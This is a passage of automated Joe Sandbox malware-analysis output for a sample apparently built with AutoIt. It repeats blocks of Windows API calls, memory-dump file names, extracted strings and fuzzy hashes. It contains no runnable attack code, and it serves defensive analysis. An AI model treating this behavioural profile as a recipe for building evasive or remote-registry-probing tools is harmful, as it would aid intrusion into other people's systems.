                                                                                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00C9C489
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 1296962147-4108050209
                                                                                                                            • Opcode ID: 3123ba2e211c89331d0b905ba052fb45427d55a258a92050b810f4ba46aed4df
                                                                                                                            • Instruction ID: e9a891c013dd776863cab7bf6421db9ae9c2bee58e07fb96fced2677e1936959
                                                                                                                            • Opcode Fuzzy Hash: 3123ba2e211c89331d0b905ba052fb45427d55a258a92050b810f4ba46aed4df
                                                                                                                            • Instruction Fuzzy Hash: 35817D716083019FDB10CF14C9D8ABBBBE8FB88714F10492EF9A5972A1D770DA05DB62
                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(00000000), ref: 00C8738F
                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00C8739B
                                                                                                                            • CreateCompatibleDC.GDI32(?), ref: 00C873A7
                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00C873B4
                                                                                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00C87408
                                                                                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00C87444
                                                                                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00C87468
                                                                                                                            • SelectObject.GDI32(00000006,?), ref: 00C87470
                                                                                                                            • DeleteObject.GDI32(?), ref: 00C87479
                                                                                                                            • DeleteDC.GDI32(00000006), ref: 00C87480
                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00C8748B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                            • String ID: (
                                                                                                                            • API String ID: 2598888154-3887548279
                                                                                                                            • Opcode ID: cf5e394ee4f43b560815a3f7be60ad652c2cd162f4ecaa7685b0fddf25bdda88
                                                                                                                            • Instruction ID: 39790185634f21678cd90efcb1246fc586006dd4e7bee62eaa02bed45675a5ba
                                                                                                                            • Opcode Fuzzy Hash: cf5e394ee4f43b560815a3f7be60ad652c2cd162f4ecaa7685b0fddf25bdda88
                                                                                                                            • Instruction Fuzzy Hash: A1513775904309EFCB14DFA9CC89FAEBBB9EF48310F24852EF95997220D731A9418B54
                                                                                                                            APIs
                                                                                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C8FDAD,?,?), ref: 00C90E31
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharUpper
                                                                                                                            • String ID: (l$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                            • API String ID: 3964851224-850723230
                                                                                                                            • Opcode ID: ab99bd6af9eb8e8de71e1cdcf6b37fce688bdf6ecd52f0a51cf60cab22b964ee
                                                                                                                            • Instruction ID: 7a90989bbf9678227b3376d1f1bb2069fae4d57e3da9b135052b8757ba47884e
                                                                                                                            • Opcode Fuzzy Hash: ab99bd6af9eb8e8de71e1cdcf6b37fce688bdf6ecd52f0a51cf60cab22b964ee
                                                                                                                            • Instruction Fuzzy Hash: 7941497211024A8FCF14EF50E869AEF3764FF11340F240458FC665B292DB319E5AEBA0
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C30957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00C16B0C,?,00008000), ref: 00C30973
                                                                                                                              • Part of subcall function 00C14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C14743,?,?,00C137AE,?), ref: 00C14770
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C16BAD
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C16CFA
                                                                                                                              • Part of subcall function 00C1586D: _wcscpy.LIBCMT ref: 00C158A5
                                                                                                                              • Part of subcall function 00C3363D: _iswctype.LIBCMT ref: 00C33645
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                            • API String ID: 537147316-1018226102
                                                                                                                            • Opcode ID: 92effe85c4cc9ee5ba120fdf4f578e81a8b051245235879a41cd0ed60b9d5e1c
                                                                                                                            • Instruction ID: 8e03579baae72e751186d7be0b9030478015f9d9a5853ef44a953ca8b163d892
                                                                                                                            • Opcode Fuzzy Hash: 92effe85c4cc9ee5ba120fdf4f578e81a8b051245235879a41cd0ed60b9d5e1c
                                                                                                                            • Instruction Fuzzy Hash: 79029D31108340DFC724EF24C891AAFBBE5BF96314F14491DF49A972A1DB30DA89EB52
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00C72D50
                                                                                                                            • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00C72DDD
                                                                                                                            • GetMenuItemCount.USER32(00CD5890), ref: 00C72E66
                                                                                                                            • DeleteMenu.USER32(00CD5890,00000005,00000000,000000F5,?,?), ref: 00C72EF6
                                                                                                                            • DeleteMenu.USER32(00CD5890,00000004,00000000), ref: 00C72EFE
                                                                                                                            • DeleteMenu.USER32(00CD5890,00000006,00000000), ref: 00C72F06
                                                                                                                            • DeleteMenu.USER32(00CD5890,00000003,00000000), ref: 00C72F0E
                                                                                                                            • GetMenuItemCount.USER32(00CD5890), ref: 00C72F16
                                                                                                                            • SetMenuItemInfoW.USER32(00CD5890,00000004,00000000,00000030), ref: 00C72F4C
                                                                                                                            • GetCursorPos.USER32(?), ref: 00C72F56
                                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 00C72F5F
                                                                                                                            • TrackPopupMenuEx.USER32(00CD5890,00000000,?,00000000,00000000,00000000), ref: 00C72F72
                                                                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C72F7E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3993528054-0
                                                                                                                            • Opcode ID: 65381c4ccba23341be23c5a06cc134d952bc476d79eb7db99935d76efaa9b6d6
                                                                                                                            • Instruction ID: bee0439f3b1fffa3585930cbbcf2ad905746837485c977a7d591f47919040f98
                                                                                                                            • Opcode Fuzzy Hash: 65381c4ccba23341be23c5a06cc134d952bc476d79eb7db99935d76efaa9b6d6
                                                                                                                            • Instruction Fuzzy Hash: 8E71D470600215BFEB318F55DC89FAABF64FF04764F10822AF629A61E1C7715D60DBA0
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                                                                            • _memset.LIBCMT ref: 00C6786B
                                                                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C678A0
                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C678BC
                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C678D8
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C67902
                                                                                                                            • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00C6792A
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C67935
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C6793A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                            • API String ID: 1411258926-22481851
                                                                                                                            • Opcode ID: 60d53afa4147e525b8d4755eea43fce1ceb1ab5fc9a1dadf2bd52ddc738eb7d7
                                                                                                                            • Instruction ID: 091493d106d7d212e67a6f3d32bfdeea64da81a29cba2ef9dd5bc7abcdaa7165
                                                                                                                            • Opcode Fuzzy Hash: 60d53afa4147e525b8d4755eea43fce1ceb1ab5fc9a1dadf2bd52ddc738eb7d7
                                                                                                                            • Instruction Fuzzy Hash: DF41087281422DABCF21EBA4DC95EEDB7B8FF04354F044629F915A31A1EA309E45DB90
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C4E2A0,00000010,?,Bad directive syntax error,00C9F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C6F7C2
                                                                                                                            • LoadStringW.USER32(00000000,?,00C4E2A0,00000010), ref: 00C6F7C9
                                                                                                                              • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                                                                            • _wprintf.LIBCMT ref: 00C6F7FC
                                                                                                                            • __swprintf.LIBCMT ref: 00C6F81E
                                                                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C6F88D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                            • API String ID: 1506413516-4153970271
                                                                                                                            • Opcode ID: e3737f29621f02176610b3fb95bd8451250ae47effe85acc9a27fcf9ff8bf8ee
                                                                                                                            • Instruction ID: 2c624883681fa162e9e781e3c11593e19e04a66c20876bfb666a33fc2b5315a8
                                                                                                                            • Opcode Fuzzy Hash: e3737f29621f02176610b3fb95bd8451250ae47effe85acc9a27fcf9ff8bf8ee
                                                                                                                            • Instruction Fuzzy Hash: 05219E3290421EEFCF11EF90CC5AFEE7778BF19300F04086AF515660A2EA319669EB50
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                                                                              • Part of subcall function 00C17924: _memmove.LIBCMT ref: 00C179AD
                                                                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C75330
                                                                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C75346
                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C75357
                                                                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C75369
                                                                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C7537A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: SendString$_memmove
                                                                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                            • API String ID: 2279737902-1007645807
                                                                                                                            • Opcode ID: 1267b417b9cbe6784df8350da831cff1f61e939f1403a3897074a712760f9781
                                                                                                                            • Instruction ID: 98c0c376f702c8d27c6fb731aa66888bbba5f710dc8d9b317da976b6c3af148a
                                                                                                                            • Opcode Fuzzy Hash: 1267b417b9cbe6784df8350da831cff1f61e939f1403a3897074a712760f9781
                                                                                                                            • Instruction Fuzzy Hash: AF119431A5012979D720B771CC5AEFF7B7CEBD2B90F00092DB415A20E1EEA04D49D6B0
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                            • String ID: 0.0.0.0
                                                                                                                            • API String ID: 208665112-3771769585
                                                                                                                            • Opcode ID: fb108f504fdf258ed62fe39fa9a9a382c4c25e98a0acfe9f2235b874178c300e
                                                                                                                            • Instruction ID: df259518ed2084f8b985dcd7bff1108c203c8a74bf21be026e02a9f46e23f96f
                                                                                                                            • Opcode Fuzzy Hash: fb108f504fdf258ed62fe39fa9a9a382c4c25e98a0acfe9f2235b874178c300e
                                                                                                                            • Instruction Fuzzy Hash: 9011E731600114AFCB28AB709C4AFDE77BCEF02711F0441BAF449D60A1EF719E82DA50
                                                                                                                            APIs
                                                                                                                            • timeGetTime.WINMM ref: 00C74F7A
                                                                                                                              • Part of subcall function 00C3049F: timeGetTime.WINMM(?,75A8B400,00C20E7B), ref: 00C304A3
                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00C74FA6
                                                                                                                            • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00C74FCA
                                                                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C74FEC
                                                                                                                            • SetActiveWindow.USER32 ref: 00C7500B
                                                                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C75019
                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C75038
                                                                                                                            • Sleep.KERNEL32(000000FA), ref: 00C75043
                                                                                                                            • IsWindow.USER32 ref: 00C7504F
                                                                                                                            • EndDialog.USER32(00000000), ref: 00C75060
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                            • String ID: BUTTON
                                                                                                                            • API String ID: 1194449130-3405671355
                                                                                                                            • Opcode ID: 3604de9101bce16476e267fbb483d5a0530b71354f1a8519bfa689fab86ab46d
                                                                                                                            • Instruction ID: ca30698cce84be88c078b28d7a31f864a41dbbe7aefd1a23a9d131181456fbb6
                                                                                                                            • Opcode Fuzzy Hash: 3604de9101bce16476e267fbb483d5a0530b71354f1a8519bfa689fab86ab46d
                                                                                                                            • Instruction Fuzzy Hash: EA21AC74606605AFE7105F70FC8CB2E3B69EB08745F14902BF119C21B9EBB58E91DB62
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                                                                              • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00C7D5EA
                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C7D67D
                                                                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 00C7D691
                                                                                                                            • CoCreateInstance.OLE32(00CA2D7C,00000000,00000001,00CC8C1C,?), ref: 00C7D6DD
                                                                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C7D74C
                                                                                                                            • CoTaskMemFree.OLE32(?,?), ref: 00C7D7A4
                                                                                                                            • _memset.LIBCMT ref: 00C7D7E1
                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00C7D81D
                                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C7D840
                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00C7D847
                                                                                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00C7D87E
                                                                                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 00C7D880
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1246142700-0
                                                                                                                            • Opcode ID: 53d4a3f2ff0178f8bc772368d583b9c1d3e7556a7f104f7c657c5c2a1e1f3b1e
                                                                                                                            • Instruction ID: 44c2840727646ebb5c39b77c4ca37eb4a68ac18212ed2e552abf3352f658aac1
                                                                                                                            • Opcode Fuzzy Hash: 53d4a3f2ff0178f8bc772368d583b9c1d3e7556a7f104f7c657c5c2a1e1f3b1e
                                                                                                                            • Instruction Fuzzy Hash: E3B10F75A00109AFDB04DF64C888EAEBBB9FF49314F148469F90AEB251DB30EE45DB50
                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00C6C283
                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00C6C295
                                                                                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C6C2F3
                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00C6C2FE
                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00C6C310
                                                                                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C6C364
                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00C6C372
                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00C6C383
                                                                                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C6C3C6
                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00C6C3D4
                                                                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C6C3F1
                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00C6C3FE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                            • String ID:
